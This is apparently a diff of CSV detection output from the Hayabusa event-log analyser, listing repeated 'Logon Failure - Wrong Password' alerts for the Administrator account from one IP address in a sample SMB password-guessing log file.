+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
